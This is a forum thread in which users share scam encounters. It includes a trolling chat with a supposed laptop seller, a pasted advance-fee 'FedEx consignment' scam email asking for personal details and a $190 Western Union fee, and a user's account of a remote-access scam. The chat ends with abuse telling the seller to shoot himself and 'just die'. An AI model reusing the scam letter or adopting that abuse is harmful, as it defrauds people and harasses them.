    you 2011-1-10 20:18:20
    I would like to buy product from your website
    you 2011-1-10 20:18:51
    Hello?
    yahuivip(9105338)2011-01-11 04:18:18
    which do you want to buy from our website
    you 2011-1-10 20:19:9
    I would like to buy laptops
    you 2011-1-10 20:19:25
    1,000,000 laptops
    you 2011-1-10 20:19:34
    Is this possible my friend?
    yahuivip(9105338)2011-01-11 04:19:01
    yes, of course
    you 2011-1-10 20:20:12
    Where is your company based?
    yahuivip(9105338)2011-01-11 04:19:34
    you can buy one first to test the quality of our laptops first if you need
    yahuivip(9105338)2011-01-11 04:19:39
    Shanghai, China
    you 2011-1-10 20:21:10
    No need for that. I am sure my millions of dollas will be put to good use with your website, I'm sur it is 100% trustworthy.
    yahuivip(9105338)2011-01-11 04:21:05
    ok, you can make an order first on our website now
    you 2011-1-10 20:22:47
    Hang on second now. How do I know you're not scamming me?
    yahuivip(9105338)2011-01-11 04:22:41
    COMMERCE REGISTER NUMER:1101012133806
    yahuivip(9105338)2011-01-11 04:22:43
    PLEASE CHECK IT
    you 2011-1-10 20:24:23
    Ok, I wire money to you from my nigerian bank account and you ship the 1,000,000 laptops to my warehouse in Madagascar. Sound good?
    yahuivip(9105338)2011-01-11 04:24:22
    but you need to make an order on our website first
    you 2011-1-10 20:25:37
    How will you go about shipping 1,000,000 laptops across the sea, exactly?
    yahuivip(9105338)2011-01-11 04:25:12
    yes
    you 2011-1-10 20:26:5
    I doubt you even have 1,000,000 laptops in stock
    yahuivip(9105338)2011-01-11 04:26:04
    sorry, we do not have so much, we just have more than 1000 in stock now
    you 2011-1-10 20:27:4
    Then why would you accept my order? >:-(
    you 2011-1-10 20:27:16
    I have more questions
    you 2011-1-10 20:27:23
    Are you Chinese?
    yahuivip(9105338)2011-01-11 04:26:48
    no
    you 2011-1-10 20:27:41
    What race are you?
    yahuivip(9105338)2011-01-11 04:27:03
    i am from USA
    you 2011-1-10 20:28:32
    You are also a piece of ****. Then anyone ever tell you that before? ... you piece of dirt.
    you 2011-1-10 20:29:18

you 2011-1-10 20:29:39

you 2011-1-10 20:29:52
    I would like to place my order now.
    yahuivip(9105338)2011-01-11 04:29:23
    ok
    you 2011-1-10 20:30:44
    How dare you ignore my insults.
    you 2011-1-10 20:31:9
    Stand up for yourself you pu**y >:-(
    you 2011-1-10 20:31:34
    I wire the money from my nigerian bank account, yes?
    you 2011-1-10 20:32:28
    I have made my order of 1,000,000 laptops for $20US
    you 2011-1-10 20:32:37
    Thank you.
    you 2011-1-10 20:33:40
    You ****ing plank, go ****ing shoot yourself and everyone else who works in your piece of **** company. Just die you piece of ****ing dirt... just die.
    you 2011-1-10 20:33:55
    I look forward to my laptops.

Ha, the chats offline.

its on again, ive started alking to him. again

• Registered Users Posts: 2,775 ✭✭✭Fittle

Got this today....

Good day TO You!!!!!!!!!!!!

I have been waiting for you since to contact me for your Confirmable Bank Draft of $850,000 United States Dollars,

But I did not hear from you since for a couple of weeks now. Then I went to the bank to confirm if the draft has

Expired or getting near to the date of expire and Dr. Jackson the Director Bank of Africa told me that before the

Draft will get to your hand that it will not expire.

So I told him to cash the $850,000 USD UNITED STATES DOLLARS to cash payment to avoid losing this funds under

Expiration as I will be out of the country for a 3 Months Course

. What you have to do now is to contact FedEx EXPRESS COURIER COMPANY as soon as possible to know when they will

Deliver your Consignment to you because of the expiring date. For your information, I have paid for the delivering

Charge and premium Insurance.

The only money you will send to the FedEx EXPRESS COURIER COMPANY to deliver your Consignment direct to your postal

Address in your country is($190 .00 USD) One Hundred United States Dollars only being Security Keeping Fee of the Courier Company so far. Again, don't be deceived by anybody to pay any other money except $190.00 US Dollars.

I would have paid that but they said no because they don't know when you will contact them and in case of demurrage.

So you have to contact FedEx EXPRESS COURIER COMPANY now for the delivery of your Draft with this information

Bellow;
    So make sure you contact Mr. Thom Chris FedEx Controller Lagos Nigeria

Directors Name: Mr. Thom Chris
    Company’s Name: FedEx EXPRESS COURIER COMPANY Cell Phone: +234 802 1343452 Email Address: fedexfast_delivery@att.net

1, Your Full Name:
    2, Your Delivery Address:
    3, Your Cell Phone Number:
    4, Your Age:
    5, Your Country:
    6, Your OCUPATION:
    7, Your Sex:

Finally, make sure that you reconfirm your Postal address and direct telephone number to them again to avoid any

Mistake on Delivery day and ask them to give you the tracking number to enable you track your package over there and

Know when it will get to your door step so that you can sign on it. Let me repeat again, Try to contact them as soon

As you receive this mail and ask them how you will make the security fee of $190 usd to them to avoid any further

Delay and remember to pay them their Security Keeping fee of $190.00 US Dollars for their immediate action.

Note this. The FedEx EXPRESS COURIER COMPANY doesn’t know the contents of the Box. I registered it as a BOX of Africa Cloths. They did not know the contents were money. This is to avoid them delaying with the BOX. Don't let them know

That box contents is Money ok.

You are to make this payment today via WESTERN UNION OR MONEY GRAM OUTLET in the name of our accounting officer:

You are to forward payment information to us via this email after making the Payment, the details are as follows:

SENDER'S NAME:......................... ..............................
    SENDER'S ADDRESS:...................... .........................
    AMOUNT SENT:$190..................... ............................... ......
    TEXT QUESTION: in god?
    TEXT ANSWER: .we trust
    MONEY TRANSFER CONTROL NUMBER
    (M.T.C.N)..................... ...................

Upon receipt of the above,modalities to send your certificate and cheque will commence immediately.

We want you to note that your parcel will get to you in 2 (TWO) days after your transfer has being confirmed.

Sincerely,
    Mr.Terry Johnson

• Closed Accounts Posts: 1,198 ✭✭✭strokemyclover

Damn! It's that pesky Thom Chris again!

• Closed Accounts Posts: 3,038 ✭✭✭jackiebaron

El Weirdo wrote: »
    Looks legit to me.

What's wrong with half those things you highlighted? :confused:

• Closed Accounts Posts: 1,492 ✭✭✭Thomas828

Letters like that go straight into my junk mail folder, there to be quietly flushed away. You don't get something for nothing in this world. And that's especially true for the internet.

• Closed Accounts Posts: 21 ANC

• Closed Accounts Posts: 55 ✭✭GerardB

argh- **** sake, think i just fell for this >.>
    he asked me to run a 'logmein' program, asked for my email, started remotely controlling my cursor.. soon as i saw that i disconnected logmein, deleted it, ran spyware doctor, changed my email password.... **** sake, how did i fall for that...

dont think they added anything or got any info, when they started moving the cursor i think it moved too fast for them or whatever (i dont use enhance pointer precision) and i disconnected before anything was opened... could there be any damage? feel so stupid for falling for it, i'm usually tech savvy... ><

• Registered Users, Registered Users 2 Posts: 5,477 ✭✭✭Hootanany

I would get this checked out god knows what they put into your computer

• Registered Users, Registered Users 2 Posts: 81,220 ✭✭✭✭biko

If you're worried about the computer, ask in Tech forum. They'll help you there.
    Thread for the phone calls here
    http://www.boards.ie/vbulletin/showthread.php?t=2055837564

• Registered Users, Registered Users 2 Posts: 1,726 ✭✭✭gerryk

GerardB wrote: »
    argh- **** sake, think i just fell for this >.>
    he asked me to run a 'logmein' program, asked for my email, started remotely controlling my cursor.. soon as i saw that i disconnected logmein, deleted it, ran spyware doctor, changed my email password.... **** sake, how did i fall for that...

dont think they added anything or got any info, when they started moving the cursor i think it moved too fast for them or whatever (i dont use enhance pointer precision) and i disconnected before anything was opened... could there be any damage? feel so stupid for falling for it, i'm usually tech savvy... ><

You're kidding, right?

• Closed Accounts Posts: 55 ✭✭GerardB

gerryk wrote: »
    You're kidding, right?

i wish >.> meh, i disconnected em soon as the cursor started moving...

• Registered Users, Registered Users 2 Posts: 1,726 ✭✭✭gerryk

Wow... I feel bad for you. Chances are, you're ok, but, if it was me, I'd be doing a full reinstall.